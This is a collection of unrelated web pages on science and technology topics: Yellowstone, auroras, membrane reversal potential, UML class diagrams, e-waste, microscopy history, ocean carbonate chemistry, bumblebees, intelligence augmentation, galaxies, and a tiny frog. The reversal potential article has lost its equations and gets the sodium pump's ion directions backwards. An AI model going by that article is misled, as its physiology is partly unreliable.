This is caused by rising magma forcing the crust to lift. Earthquakes, 77 of them in the Month of June of this year are swarming (which is not uncommon). Geysers that have been dormant for years are coming to life again, and those that have been active are starting to change their schedule. All of which are signs that geologically, the area is becoming more unstable. So what happens if when this big super volcano erupts? Ash is going to travel for hundreds of miles, the ecological system of the area is going to be changed for a very long time and it has the potential to destroy a ton of life. Check out this report I am not worried about an eruption of the Yellowstone caldera, but I just think the subject is really cool. The geologic processes are amazing, and in a state of flux. Look at the picture at the top of this post to see the swarm increase in the number of earthquakes for the last 30-50 years. See the increase…whooa baby. (the picture was take without permission of the author of the report linked above). Another great Yellowstone Volcano FAQ can be found here
<urn:uuid:1ea76be6-d2d0-408e-878e-3756b49fdab5>
2.828125
553
Personal Blog
Science & Tech.
63.916538
NASA eClips: Aurora: Why the exist and what causes them This NASA video segment explores the phenomenon of the polar aurora, called the Northern Lights (Aurora Borealis) in the Northern hemisphere. Scientists have been investigating them for nearly 200 years. With the help of satellite measurements we now have a very detailed understanding of what they are and how they are produced. This video will introduce the THEMIS satelite constellation, launched in 2005. Its five satellites were placed in specific orbits to track the events that lead from the arrival of a solar storm, to the first glimpses of the Northern Lights. Related Mathematics Problems These problems provide a mathematical introduction to some of the issues related to solar activity and space weather Problem 11: The Height of an Aurora Students use simple geometry to deduce the height of an aurora above ground [Download PDF] Problem 22: The North and South Magnetic Poles Students use satellite images of the polar aurora to determine the location of the north and sount magnetic poles.[Download PDF]
<urn:uuid:407b2a3f-1c17-4ef9-80e1-6ba0a0db029c>
4.03125
212
Content Listing
Science & Tech.
26.189655
The reversal potential (also known as the Nernst potential) of an ion is the potential of the cell membrane at which there is no net (overall) flow of ions from one side of the membrane to the other. It defines the negative resting potential of neurons, muscle cells and other excitable cells when the cell is quite (not exited). In these cells the reversal potential is created by the selective membrane permeability to K+. In a single-ion system, reversal potential is also the equilibrium potential (numerical values are identical). "Equilibrium" means that at this voltage, both outward and inward rates of ion movement are the same; the ion flux is in equilibrium. Ions still may move but the net current is zero. "Reversal" means that a change of membrane potential on either side of the equilibrium potential reverses the overall direction of ion flux. However multi-ion systems may be in the state when the summed currents of the multiple ions equals zero. While this is a reversal potential in the sense that membrane current reverses direction, it is not an equilibrium potential because some (frequently all) of the ions are not in equilibrium and thus have net fluxes across the membrane. When a cell has significant permeabilities to more than one ion, Nernst equation is not suitable and the Goldman-Hodgkin-Katz equation is required to calculate the potential. The fact that the reversal potential for a particular membrane matches the equilibrium potential for a particular ion is the experimental proof that this membrane contains channels that are specific for that ion. Membrane itself has little permeability for charged particles. Hence most of the ion flow across is is caused by the presence a specialized proteins, ion channels. These channels are often highly specific to one type of ion (K+, Na+, etc). When a channel type that is selective to one species of ion dominates (because other ion channels are closed, for example) then the voltage inside the cell is will equilibrate (i.e. become equal) to the reversal potential for that ion (assuming 0 outside the cell). For the most cells, potassium conductance dominates during the resting stage and so the resting potential is close to the K+ (potassium ion) reversal potential. During a typical action potential, the large number of Na+ channels open, bringing the membrane potential close to the reversal potential of Na+. The reversal potential can be calculated from the Nernst equation (so it is also called Nernst potential). The term driving force is related to equilibrium potential, and is likewise useful in understanding the current in biological membranes. Driving force refers to the difference between an ion's equilibrium potential and the actual membrane potential. It is defined by the following equation: In words, this equation says that: the ionic current is equal to that ion's conductance multiplied by the driving force, the difference between the membrane potential and the ion's equilibrium potential . The ionic current will always be zero if the membrane is impermeable () to the ion in question. Probability that a ion takes a state of energy E is proportional to the Boltzmann factor where T the temperature and k is the Boltzmann constant. This energy at location x is equal to where is the potential at the location x. Hence the probability to find a ion somewhere around x is proportional to where q is the charge of the ion. The number of ions is sufficiently huge to interpret probability as the actual density. Now let's assume that the position x1 and x2 are on the opposite surfaces of the membrane right across the lipid layer. For the positively charged ions, the ion density ration between the point x1 and x2 is is the difference of electric potentials over two positions that is required to find. It can be found from the expressions above as where n1 and n1 are the molar concentrations of the ion on both sides of the membrane. For the resting cell with known usual inner (about 400 mM/l) and outer (about 20 mM/l) concentrations of K+ the resting potential is about -77. As the higher K+ concentration is inside, the cell is negatively charged. The computed potential does not depend on the membrane permeability (as long as it is non zero). The formula assumes that the volumes inside and outside are big enough not to impact the concentrations during formation of the potential (close to the truth for the most of living cells). Some sources referenced in the literature list express this equation through Avogadro constant (the number of ions in one moll), Faraday constant ( for monovalent ions) and universal gas constant (). From here, Some ion transporters transfer multiple ions and uncharged molecules during they operating cycle. For instance, a sodium pump may transfer 3 K+ ions inside and 2 Na+ ions outside the cell. If the total electric charge of all transferred ions remains non zero, a membrane where such transporter is dominant still have the reversal potential. When transporter transfers x Na+ ions outside in exchange of y K+ ions inside and uses no additional energy, the formula of the reversal potential can be derived from (B. Chapman 1978) as From this formula it is obvious that reversal potential is only defined when . Transferring the equal number ions of the same valence in the opposite directions has no impact on existing reversal potential, if any. Transporter can also couple transport of the charged ions with the transport of neutral molecules. In such case the chemical gradient of these "passenger molecules" also has impact on reversal potential. For instance, GABA transporter, described in ) co-translocates a neutral molecule of γ-aminobutyric acid (GABA), two Na+ ions and one Cl- ion across the plasma membrane during a single cycle of operation. The reversal potential then can be computed from formula Here 2-1 means where is the valence of Na+ and is the valence of Cl- (both equal to one). Reversal potential can also be computed for the membrane that contains active ion transporters. Such transporters convert between chemical energy (usually ATP) and the energy of the ion electrochemical gradient, but they convert in both directions. At the reversal potential, not just the ion currents are balanced but also the ATP synthesis rate is equal to the ATP breakdown rate. The calculated potential depends on the free energy of the ATP breakdown. It also depends on how many ions are transferred in both directions while breaking or synthesizing the single ATP molecule in exchange. B. Chapman (1978) extends the formula for K+/Na+ antiporter for the usual case when this transporter also breaks an ATP molecule during its cycle: where A is a free energy of the ATP breakdown. The formula has also been used to determine this energy under physiological conditions.
<urn:uuid:54064140-01e5-4a2c-b2fb-b1578db73766>
3.546875
1,401
Knowledge Article
Science & Tech.
38.171556
Rusty Elliotte Harold continues his coverage of VML in thi ssecond of two parts. This part includes coverage on how to position VML shapes with CSS properties, More articles by Elliotte Harold Microsoft's Vector Markup Language (VML) is an XML application for vector graphics that can be embedded in Web pages in place of the bitmapped GIF and JPEG images loaded by HTML's IMG element. Vector graphics take up less space and thus di Since XML is more powerful than HTML, you might think that you need to learn even more elements, but you dont. XML gets its power through simplicity and extensibility, not through a plethora of elements. Well-formed XML is critical in order to maintain the accuracy of your information. Elliotte Rusty Harold presents guidelines for creating well-formed XML. Real-world Web pages are extremely sloppy. Well-formed HTML is HTML that adheres to XML's well-formedness constraints but only uses standard HTML tags. Well-formed HTML is easier to read than the sloppy HTML most humans and WYSIWYG tools such as FrontPage write. Elliotte Rusty Harold presents guidelines for creating well-formed HTML.
<urn:uuid:171986ab-6d6b-4d26-832e-35bf1ab2247e>
2.84375
242
Content Listing
Software Dev.
55.454783
Narrow the scope of your process to individual elements (designed with Class Diagrams). Add other diagrams where they help you understand the system. Repeat Steps 1 through 4 as appropriate for the current scope. In this step, you’ll narrow your scope to look at a single component (as identified in Step 4). By zooming in to the scope of the component, you can apply the same analysis and design processes to determine the structure of the component. You’ll begin by playing “Interface Hangman”: treating the interfaces to a component as actors from the perspective of the component, as shown in Figure 2-32. If you’re confused about this step, consider this definition of an actor: Well, in this step, you narrow your scope so that the only “system” of interest is one particular component (at a time). And “outside” that component lie any actors that interact with it and any other components that interact with it. These all meet the definition of “actors” now that you’ve narrowed your scope; however, one rule for interfaces is that they define everything that is known about the connections between components, both for the source component and for the client component. Thus, from the perspective of the current component, the interfaces and user interfaces that it realizes are all that you know about the actors that make requests of it; and the interfaces on which it depends are all that you know about the actors that provide services to it. So it will have actors that represent the users of any user interfaces it provides; but you’ll also create “component actors” that represent the interfaces related to the current component. (Despite Figure 2-32—which is drawn only to convey the idea of interfaces as actors, not as an example you should follow—you may want to use interface icons to represent these component actors, rather than actor icons. This will emphasize that these are interfaces, not people.) If the interfaces are component actors, then the methods of interfaces realized by the current component may be treated as component use cases. Again, consider this definition of a use case: So if a use case represents behavior required by an actor, then a component actor’s requirements—and thus its component use cases—are defined by the operations of the interface it represents. No other requirements are possible, because the interface completely defines how the component and its client may interact. The only other requirements are those of the end user actors who make use of the component’s user interfaces. So in this step of Five-Step UML, you’ll perform the following substeps: The only particularly new elements in this step are those related to Class Diagrams: classes, associations, and dependencies. A class represents the operations and attributes of one or more objects within your system. It binds attributes and operations to completely define the behavior of the objects. Thus a class definition serves the same purpose for an object that an interface definition serves for a component: it describes the ways in which client elements may use the given element. In a Class Diagram, a class appears as a rectangle broken into three sections. The top section identifies the name of the class, the middle lists the attributes of the class, and the bottom section lists the operations of the class. If it makes the diagram less cluttered and thus more clear, you may hide the attributes or operations for any class in the diagram. You may even hide some of the attributes and operations, while showing others. But I usually discourage this—unless the class definition is really large and overwhelms the rest of the diagram—because readers tend to assume that a partial list is a full list.Classes: A.NET Perspective Now you’re moving from domain classes to code classes. You need to consider the precise .NET mechanisms for implementing each class. What is its base class? What are its attributes, including types and initial values? What are its operations, including parameters and return types? What kind of class is it: a class, a structure, an enumeration, a delegate? An association represents an object of one class making use of an object of another class. It is indicated simply by a solid line connecting the two class icons. An association indicates a persistent, identifiable connection between two classes. If class A is associated with class B, that means that given an object of class A, you can always find an object of class B, or you can find that no B object has been assigned to the association yet. But in either case, there is always an identifiable path from A to B. Class A uses the services of class B or vice versa. Associations: A .NET Perspective In .NET code, an association is most probably implemented as one class containing another—or to be more precise, containing a reference to the other, since all .NET classes other than structures are always contained by reference. For some designs, each class might contain a reference to the other. These concepts are discussed further in Chapter 4. In Class Diagrams, a dependence represents an object of one class making use of or somehow “knowing about” an object of another class; but unlike association, dependence is a transitory relationship. If class X is dependent on class Y, then there is no particular Y object associated with an X object; but if the X object “finds” a Y object—perhaps it is passed as a parameter, or it receives one as the return from an operation that it calls, or it accesses some globally accessible Y object, or it creates one when it needs one—then it knows what it can do with the Y object. Object X is potentially affected by a change in Object Y. As in other diagrams, dependence is indicated by a dashed arrow connecting the two class icons.Dependence: A. NET Perspective In .NET code, dependence has become almost a nonentity. In old C++ code, for example, dependence could be implemented as one class #include’ing the header file for another class. That #include statement indicated that the first class knew what to do with the second class. But in .NET, most classes are visible to other classes. The closest things to dependence in .NET are But both of these uses are package specific, or perhaps component specific. You may choose to avoid dependence for this reason; but I still prefer to model dependence among classes, because it indicates that one class may create or otherwise manipulate objects of another class. Given these elements, then, a Class Diagram depicts classes and associations between them. Figure 2-33 is a Class Diagram that depicts the classes and associations that may be useful in the Kennel Management System. Classes: A (Further) .NET Perspective The .NET Framework contains over 3,300 classes for common infrastructure operations. Before you design your own classes, you might save time to see if .NET gives you classes that provide the functionality you need, or at least a large chunk of it. TIP: To learn more about Class Diagrams and design, see Chapters 4 and 9. Exercise 205: Define, Refine, Assign, and Design Within Your Components: blog comments powered by Disqus
<urn:uuid:0494b634-a017-4d5c-9b48-65f0118ccb6b>
3.140625
1,502
Tutorial
Software Dev.
43.729681
Introductionsun, intensely hot, self-luminous body of gases at the center of the solar system. Its gravitational attraction maintains the planets, comets, and other bodies of the solar system in their orbits. Sections in this article: The Columbia Electronic Encyclopedia, 6th ed. Copyright © 2012, Columbia University Press. All rights reserved. See more Encyclopedia articles on: Astronomy: General
<urn:uuid:ea5a452a-2da0-4224-98e2-44e37bb0a6d2>
3.15625
85
Knowledge Article
Science & Tech.
21.611368
Science Reference Guides Geosphere-biosphere interactions and climate. Edited by Lennart O. Bengtsson, Claus U. Hammer. New York, Cambridge University Press, 2001. 302 p. Johnson, Douglas L. Land degradation: creation and destruction. 2nd ed. Lanham, Rowman & Littlefield, c2007. 303 p. Includes bibliographical references (p. 273-296). GE140.J64 2007 <SciRR> Kemp, David D. Exploring environmental issues: an integrated approach. London, New York, Routledge, 2004. 444 p. Moran, Emilio F. People and nature: an introduction to human ecological relations. Malden, MA, Blackwell Pub., 2006. 218 p. (Blackwell primers in anthropology, 1) Includes bibliographical references (p. -205) Smil, Vaclav. The earth's biosphere: evolution, dynamics, and change. Cambridge, Mass., MIT Press, c2002. 346 p. See especially Chapter 9, Civilization and the Biosphere, p. 229. TOP OF PAGE Imhoff, Marc L. and others. The consequences of urban land transformation for net primary productivity in the United States. Remote sensing of environment. v. 89, no. 4, 29 February 2004: 434-443. Luck, G.W., and others. Alleviating spatial conflict between people and biodiversity. Proceedings of the National Academy of Sciences, v. 101, no. 1, 2004: 182-186. Ricketts, T. and M. Imhoff. Biodiversity, urban areas, and agriculture: locating priority ecoregions for conservation. Ecology and v. 8, no. 2, 2003. Rosenqvist, A. and others. A review of remote sensing technology in support of the Kyoto Protocol. Environmental science & policy. v. 6, no. 5, October 2003: 441-455. Rosenzweig, M.L., and others. Estimating diversity in unsampled habitats of a biogeographical province. Conservation biology. v. 17, no. 3: 864–874. TOP OF PAGE SELECTED INTERNET RESOURCES Atlas of the Biosphere Center for Sustainability and the Environment University of Wisconsin GLOBIO: Measuring Human Impacts On The Biosphere The GLOBIO (Global Methodology for Mapping Human Impacts on the Biosphere) consortium aims to develop a global model for exploring the impact of environmental change on biodiversity. It is designed to support UNEP's activities relating to environmental assessment and early warning. Land Cover Institute U.S. Geological Survey LCI addresses land cover topics from local to global scales, and in both domestic and international settings.
<urn:uuid:63d58fe5-6578-45c9-b82d-814dc3013329>
2.828125
616
Content Listing
Science & Tech.
52.318055
CAT | History In today’s modern era, it’s almost impossible to imagine a time when we didn’t know about microscopic particles and structures; magnification is a fundamental part of everyday life, from a pair of reading glasses to the side mirrors on a car. With the birth of the optical microscope in the 17th century, scientists were able to meticulously document, research, and discover a world of things normally invisible to the naked eye. It seemed as though the wonders of the microscopic was infinite – until the 1930s, when it became clear that optical microscopy wasn’t telling the entire story. There were forces at work that were far too small for even the most powerful lenses to see; at some point, the image simply couldn’t resolve clearly. It seemed as though optical microscopes had been pushed to their furthest possible limits. But how could something be too small for light to see, and how could you possibly examine it? This set of problems was the catalyst for scientists to begin branching out from light-based microscopy. The theoretical framework explaining the limits of light-based magnification were already in place. The issue lay in understanding how light worked, and why it failed at certain magnifications. Visible light is electromagnetic radiation, part of a wide spectrum of rays that stretches from radio waves to X-rays, microwaves, gamma rays, and more. All EM Radiation is made of particles called photons, which travel in a wavelength; the speed and frequency of that wave will determine what sort of radiation it is, and how it interacts with various objects. X-rays, for instance, have a wavelength that is too short to bounce off of human flesh, but does reflect dense material like bone, allowing the doctor to clearly see your broken wrist. UV radiation can penetrate the skin enough to cause a sunburn, but we can’t see the rays with our eyes. We are able to see objects because visible light bounces off of them and returns to our eyes. When that wavelength encounters an object, like a sample on a slide or the magnifying lenses of a microscope, the interference will cause the wave to spread out and weaken. As the light passes through a smaller and smaller space, it will scatter more and more. This phenomenon is called diffraction, and it is the major limit of optical microscopy: at a certain point, the photons are just too big and clunky to accurately bounce off of the sample and resolve clearly. All of this was proven in 1873, when physicists Hermann von Helmholtz and Ernst Abbe demonstrated that optical resolution was dependent on the wavelength of the light source. They posed the crucial question: what if you could somehow use an illumination source that had a smaller wavelength than light? It was purely theoretical; the existence of electrons wasn’t proven until 1896. But the idea stayed around in various scientific circles; the theory that electrons could travel in a wave was proposed in a 1924 paper, and in 1926 German scientist Hans Busch showed that magnets could be used to direct a stream of electrons in a specific direction. The problems were in place and the theories were quickly being proven: it wouldn’t be long before scientists broke through the limits of light and found a way to see the invisible all over again. We’re surrounded by an abundance of technology, nowadays so it can sometimes be hard to imagine what it was like to look through a microscope for the very first time in the 1600s. Before the invention of the compound (multi-lensed) microscope, people believed that the world was comprised solely of what could be seen with the naked eye; it must have been overwhelming to realize what humanity had been missing! Once optical microscopy took off, scientists could finally get a detailed look at everything from well-known insects to completely new bacteria and understand how the tiny structures of a material affected its behavior. Scientists are well-known for conducting experiments and documenting every detail of their actions. So it’s not surprising that the great analytical minds of the day began to sketch out the details of what they saw under the microscope in order to preserve the images for future reference. These images came to be known as micrographs, and they have evolved alongside the microscope in terms of their level of detail and use of technology. Initially, micrographs were hand-drawn sketches detailing what the observer saw on the slide. One of the first known images made with a microscope was drawn by Francesco Stelluti, who published a sheet of bee anatomy in 1630. Thirty-five years later, scientist Robert Hooke wrote and published Micrographia, the first major book about microscopy. The tome detailed his observations: the eyeball of a fly, a plant cell, insect wings, and a huge fold-out engraving of a louse. Micrographia was a monumental best-seller that also coined the biological term ‘cell’ after Hooke’s famous inspection of a piece of cork. Basic sketches remained an easy method for documenting microscopic images for many years. When photography technology caught up, people would often simply hold a standard camera up to a microscope eyepiece and take a picture; after all, the camera was designed to resemble the viewpoint of a human eye, so it made sense to try to capture the slide permanently by exposing it to film. This technique is called the afocal method’. A typical optical microscope emits parallel light rays from its source up into the ocular, so an image can be created using a camera that is made for capturing very distant objects; those lenses are designed to work with parallel light as well. The eyepieces of both the ocular and the camera must be carefully chosen to work together to capture a clear image. The direct imaging method is far more straightforward: both the eyepiece of the microscope and the lens of the camera are removed, and the camera is placed on the microscope tube so that its shutter surface matches the primary image plane projected by the microscope. You can also purchase mechanical adapters, which attach the camera to the microscope tube directly and allow for a much clearer method of focusing. Digital photography has made micrographs much easier to produce. Modern microscopes may contain a built-in camera and USB connection, which will allow you to plug them into a computer and record images directly onto the hard drive. However, a more flexible approach is to buy a standard microscope and add an external microscope camera. That way, you can use different cameras on the same microscope and vice versa. As important, you do not need to buy an entirely new unit if the camera software fails. Whatever your method, microscope imaging, or photomicrography, has grown and changed alongside microscopy, recording humanity’s findings for future research and posterity. During my quest to find microscope-related news and content on the Web (it’s a tough challenge sometimes), I came across this blog by way of Boing Boing Gadgets: BibliOdyssey: Early Microscopes. This particular entry shows illustrations of early microscopes dating back to the 1600s culled from various books, including Robert Hooke’s famous Micrographia (1665), Le Microscope à la Portée de Tout le Monde, or The Microscope Made Easy, (Henry Baker, 1742) and Phisicalisch Mikroskopische (Martin Frobenius Ledermüller, 1760s). There are excerpts from the books, too, including this quote by Antonie van Leeuwenhoek about his discovery of bacteria: “They were incredibly small, nay so small, in my sight, that I judged that even if 100 of these very wee animals lay stretched out one against another, they could not reach to the length of a grain of coarse Sand.” Continue reading through the entry and there’s a short history of the microscope, which includes some interesting facts. The first scientific paper relying on microscopy studies was published in 1661. Robert Hook’s Micrographia was a hit four years later because it showed a mesmerized public the very first illustrations of everyday items as they appeared under a microscope, turning experimental science on its head. Pretty neat stuff, actually. Oh, and the pictures are cool, too.
<urn:uuid:2b2bac14-847c-49ed-85d5-8ce1e7dffe62>
3.984375
1,716
Personal Blog
Science & Tech.
35.985926
(CO2.aq),1 bicarbonate ion (HCO3–), and carbonate ion (CO32–) (see Box 2.1 for definitions.). CO2 dissolved in seawater acts as an acid and provides hydrogen ions (H+) to any added base to form bicarbonate: CO32– acts as a base and takes up H+ from any added acid to also form bicarbonate: Borate [B(OH)4–] also acts as a base to take up H+ from any acid to form boric acid [B(OH)3]: As seen in reactions 1 and 2, bicarbonate can act as an acid or a base (i.e., donate or accept hydrogen ions) depending on conditions. Under present-day conditions, these reactions buffer the pH of surface seawater at a slightly basic value of about 8.1 (above the neutral value around 7.0). At this pH, the total dissolved inorganic carbon (DIC ~ 2 mM) consists of approximately 1% CO2, 90% HCO3–, and 9% CO32– (Figure 2.1). The total boric acid concentration (B(OH)4– + B(OH)3)) is about 1/5 that of DIC. As discussed in section 2.2, increases in CO2 will increase the H+ concentration, thus decreasing pH; the opposite occurs when CO2 decreases. We note that isotope fractionation between B(OH)3 and B(OH)4– is used for estimating past pH values (Box 2.2). Life in the oceans modifies the amount and forms (or species) of inorganic carbon and hence the acid-base chemistry of seawater. In the sunlit surface layer, phytoplankton convert, or “fix,” CO2 into organic matter during the day—a process also known as photosynthesis or primary production. This process simultaneously decreases DIC and increases the pH. The reverse occurs at night, when a portion of this organic matter is decomposed by a variety of organisms that regenerate CO2, resulting in a daily cycle of pH in surface waters. A fraction of the particulate organic matter sinks below the surface where it is also decomposed, causing vertical variations in the concentrations of inorganic carbon species and pH. The net result is a characteristic maximum in CO2 concentration and minima in pH and CO32– concentration around 500 to 1,000 meters depth 1 The proper notation for carbon dioxide gas is CO2.g; carbon dioxide dissolved in water is CO2.aq. However, for simplicity, these notations are not carried through the report; the text provides adequate context to determine which form of CO2 is being discussed.
<urn:uuid:83f71493-3e49-4276-a40a-ec809f8c5efc>
3.703125
574
Academic Writing
Science & Tech.
56.875867
The great yellow bumblebee, Bombus distinguendus, is one of our most striking species. It has shown a very dramatic decline in Britain, highlighting the plight of bumblebees and making it a flagship species for bumblebee conservation. Bees are extremely important for pollinating commercial crops and they account for 85% of the value of all insect pollinated crop plants in Europe. The great yellow bumblebee is a large and distinctive looking species. It is declining in geographical range within Britain and is now restricted to just the very northern edge of the country. It is also declining in northern Europe, but is still recorded widely in northern Asia, where it is found as far east as Attu Island in the Pacific. Find out about the taxonomy of the great yellow bumblebee, what makes it stand out from other bee species, and the key features of the males and females. Read about the distribution of the great yellow bumblebee and view distribution maps for the UK and the world. Learn about the biology of the great yellow bumblebee, including lifecycle and life expectancy information. Discover more about this bee's behaviour, including the types of flowers that it likes to collect pollen from. Explore the conservation of the great yellow bumblebee, learn about the threats it faces and view trends in the distribution range within Britain. See a list of reference material. A map showing the global distribution of Bombus distinguendus. Bombus distinguendus, the great yellow bumblebee© D. Goulson A female specimen of Bombus distinguendus© P Williams A male specimen of Bombus distinguendus© P Williams The principal remaining strongholds for Bombus distinguendus are in the Scottish machair grassland© D Goulson Habitat of the great yellow bumblebee, Bombus distinguendus, in the semi-arid areas of Inner Mongolia© P Williams Bombus distinguendus feeding on clover© D Goulson Research entomologist specialising in bees. Encourage bumblebees to nest in your garden by leaving an untidy, undisturbed corner. Bumblebees need a range of different flowers for nectar and pollen, such as native wildflowers like knapweed and clovers, and flowering herbs such as sage and chives. Avoid highly cultivated or double flower varieties as they produce little pollen or nectar.
<urn:uuid:edd189ad-198c-4d90-a4ec-335822b56bef>
3.828125
505
Knowledge Article
Science & Tech.
36.152056
In today's high paced modern world, technology is moving faster and faster and boosting the speed of our everyday lives. Every eight months there is a new model of some type of technological device reaching the market and the old is being discarded as it is unable to keep up with our fast paced society. Where have the millions of old, unwanted computers and other electronics gone? Many have suspected, that relatively few old PC's are being recycled and that most are stored in warehouses, basements, and closets or have met there end in municipal landfills or incinerators. In recent years a great deal of attention has been devoted to the environmental impact of computers and other electronic equipment as these items pose a massive problem for municipal landfills and hazardous effects to human life. Users' manuals can be a pain to read, nevertheless are pretty handy, they cover most of everything we need to know about newly purchased equipment. What is not covered in the users' manual are the toxic chemicals and heavy metals that go into computers and other electronic devices, nor the waste computer-manufacturing generates. Of the approximately one thousand different substances included in a typical PC, every computer contains five to eight pounds of lead. Exposure to lead and other toxic ingredients, such as mercury, cadmium, brominated flame retardants, and some plastics, may stun brain development, disrupt hormone functions, cause cancer, or affect reproduction (Slone, 2000). Manufacturers combine lead; the leading toxic material found in electronic equipment, with tin to form solder, which is used in the production of circuit boards found inside electronic products. Lead is highly toxic and can harm children and developing fetuses, even at low levels of exposure. Brominated flame retardants, used in circuit boards and plastic casing, do not break down easily and build up in the environment. Long term... [continues] Cite This Essay (2007, 03). The Environmental Impact of Electronic Waste. StudyMode.com. Retrieved 03, 2007, from http://www.studymode.com/essays/Environmental-Impact-Electronic-Waste-109709.html "The Environmental Impact of Electronic Waste" StudyMode.com. 03 2007. 03 2007 <http://www.studymode.com/essays/Environmental-Impact-Electronic-Waste-109709.html>. "The Environmental Impact of Electronic Waste." StudyMode.com. 03, 2007. Accessed 03, 2007. http://www.studymode.com/essays/Environmental-Impact-Electronic-Waste-109709.html.
<urn:uuid:b6bc9123-b9dc-434f-b6be-f0f564c40eff>
3.375
536
Truncated
Science & Tech.
42.752244
From our analysis of falling in air, we found that if an object falls long enough through a fluid, it will reach a terminal velocity. Let's look a little closer at this - Terminal velocity occurs when the air resistance (sometimes called "drag") force equals the weight of the falling object. This means that: - the object is falling with a constant velocity - its acceleration is zero. - heavy objects will have a higher terminal velocity than light objects. (Why? It takes a larger air resistance force to equal the weight of a heavier object. A larger air resistance force requires more speed.) Therefore, heavy objects will fall faster in air than light objects. (This doesn't happen in free last update November 2, 2007 by JL
<urn:uuid:259e7a9f-034d-45c0-a801-fafb1e16ca45>
4.21875
162
Knowledge Article
Science & Tech.
55.615625
Introductory Trailer to Chandra In Florence, Italy, in the year 1609, the world changed. Using a small telescope, Galileo proved that the Earth is not distinct from the universe, but part of it. And he showed that there is much more to the universe than we see with the naked eye. In the twentieth century, astronomers made another revolutionary discovery - that optical telescopes reveal only a portion of the universe. Telescopes sensitive to invisible wavelengths of light have detected microwave radiation from the Big Bang, infrared radiation from proto-planetary disks around stars, and X-rays from explosions produce by black holes. Ten years ago this July, the most powerful X-ray telescope ever made began its exploration of the hot Universe. Explore the Universe with Chandra.
<urn:uuid:9e8d4320-ac23-4b83-b463-dbe48d860434>
3.828125
154
Truncated
Science & Tech.
31.210551
In some ways the augmentation of intelligence already has a long history. From the first time we cut notches into sticks or painted on cave walls, we were augmenting our memories by creating a tangible record. The written word developed this concept even further. More recently, the internet and search engines have given us access to a vast subset of human knowledge, effectively extending our memory by many orders of magnitude. Now a number of fields stand at the threshold of augmenting human intelligence directly. Pharmacological methods include drugs called nootropics which enhance learning and attention. Among these are Ampakines which have been tested by DARPA, the research arm of the Defense Department, in an effort to improve attention span and alertness of soldiers in the field, as well as facilitate their learning and memory. Biotechnological and genetic approaches are also being explored in order to identify therapeutic strategies which promote neuroplasticity and improve learning ability. A 2010 European Neuroscience Institute study found memory and learning in elderly mice restored to youthful levels when a cluster of genes was activated using a single enzyme. Several stem cell research studies offer hope not only for degenerative mental pathologies but also for restoring our ability to learn rapidly. In another study, mice exposed to the natural soil bacterium, Mycobacterium vaccae, found their learning rate and retention significantly improved, possibly the result of an autoimmune response. All of these suggest we’ve only begun to scratch the surface when it comes to improving or augmenting intelligence. Brain-computer interfaces, or BCIs, are another avenue currently being explored. A BCI gives a user the ability to control a computer or other device using only their thoughts. BCIs already exist that allow the operation of computer interfaces and wheelchairs, offering hope of a more interactive life to quadriplegics and patients with locked-in syndrome. Systems are even being developed to replace damaged brain function and aid in the control of prosthetic limbs. Cochlear implants are restoring hearing and considerable progress has been made in developing artificial retina implants. Work has also been done on an artificial hippocampus and it is likely there will be a number of other brain prostheses as the brain becomes better understood. All of these point to a day when our ability to tie in to enhanced or external resources could become a reality. Of course, as with many new technologies, there will be those who believe intelligence augmentation should be restricted or banned altogether. But as we’ve seen in the past, this is a response that is doomed to failure. Even if draconian measures managed to prohibit R&D in one country, there will always be others who believe the benefits outweigh the costs. For instance, China is currently sequencing the genomes of 1,000 Chinese adults having an IQ of 145 or higher and comparing these to the genomes of an equal number of randomly picked control subjects. Since a substantial proportion of intelligence is considered to be heritable, the project has interesting potential. But even if this method fails to identify the specific genes that give rise to high intelligence, important information is sure to be garnered. However, regardless of the result, it definitely tells us that China, and probably others, are already committing significant resources to this matter. The augmentation of human intelligence is likely to be a mixed blessing, yielding both benefits and abuses. Regardless of our feelings about it, we would be wise to anticipate the kind of future such enhancements could one day bring.
<urn:uuid:9de3e5e1-1e93-4449-93ca-2091a00a18d7>
3.5
698
Personal Blog
Science & Tech.
23.36861
3.4. The size-luminosity distribution function The suggestion that it is smaller galaxies that are driving the increase in star-formation rate to z ~ 1 is more directly illustrated by the bivariate size-luminosity function. The Fig. 5 (from Paper 2) shows the bivariate size-luminosity function for all galaxies in the CFRS sample that has been observed with HST, computed at 0.2 < z < 0.5 and 0.5 < z < 1. For generality, the size parameter used here is a half-light radius, generated from the 2-dimensional fits. No particular distinction has been made between spheroidal and disk components. Figure 5. The bivariate size-luminosity function for all CFRS galaxies, computed in two redshift intervals and for two cosmologies. The size is a half-light radius. The largest evolutionary changes occur for galaxies with moderate sizes and luminosities. This diagram shows how the largest evolutionary change is the filling in of the central area of the diagram by the appearance of numerous luminous but moderately sized galaxies. These galaxies have MAB(B) ~ -21.5 and r0.5 < 5h-150 kpc. The "ridge-line" at large sizes at the rear of the figure stays more or less unchanged aside from the effects of the modest brightening described above. Again, however, it should be noted that the impression of differential behavior is weakened for low q0: This is because a given galaxy appears to be larger and more luminous, but rarer, as q0 is decreased.
<urn:uuid:e3cb3e7a-66ba-4a82-a3a2-9aa6450213fe>
2.90625
335
Academic Writing
Science & Tech.
52.318793
January 12, 2012 The new species Paedophryne amauensis is the world's smallest vertebrate...so far. Photo from: Rittmeyer EN et al. (2012) Ecological Guild Evolution and the Discovery of the World's Smallest Vertebrate. PLoS ONE 7(1): e29797. The smallest specimen of the new frog, named Paedophryne amauensis was just 7 millimeters (0.27 inches) long, the largest around 8 millimeters (0.31 inches). The previous record-holder was a fish called Paedocypris progenetica which ranged from 7.9 to 10.3 millimeters (0.31 to 0.4 inches). According to the paper, the frog genus Paedophryne (meaning 'child frog' in Ancient Greek) includes four of the world's top 10 tiniest frogs. The genus was first described in 2010. On the other end of the spectrum, the blue whale (Balaenoptera musculus) is world's biggest vertebrate. "Little is understood about the functional constraints that come with extreme body size, whether large or small," Christopher Austin of Louisiana State University said in a press release, adding that, "it was particularly difficult to locate Paedophryne amauensis due to its diminutive size and the males' high pitched insect-like mating call. But it's a great find. New Guinea is a hotspot of biodiversity, and everything new we discover there adds another layer to our overall understanding of how biodiversity is generated and maintained." Papua New Guinea's rainforests, some of the least-explored on Earth, are imperiled by logging, monoculture plantations, and mining, worsened by poor governance and widespread corruption. Communities own 90 percent of the land in Papua New Guinea, but have seen their rights radically diminished in recent years as foreign corporations have taken an interest in the mountainous nation. A study in 2008 found that nearly a quarter of the country's forests were degraded or lost between 1972 and 2002, a number far higher than expected. "Papua New Guinea has some of the world's most biologically and culturally rich forests, and they’re vanishing before our eyes," tropical ecologist William Laurance of James Cook University in Cairns, Australia, said in 2010. Close-up of Paedophryne amauensis. Photo from: Rittmeyer EN et al. (2012) Ecological Guild 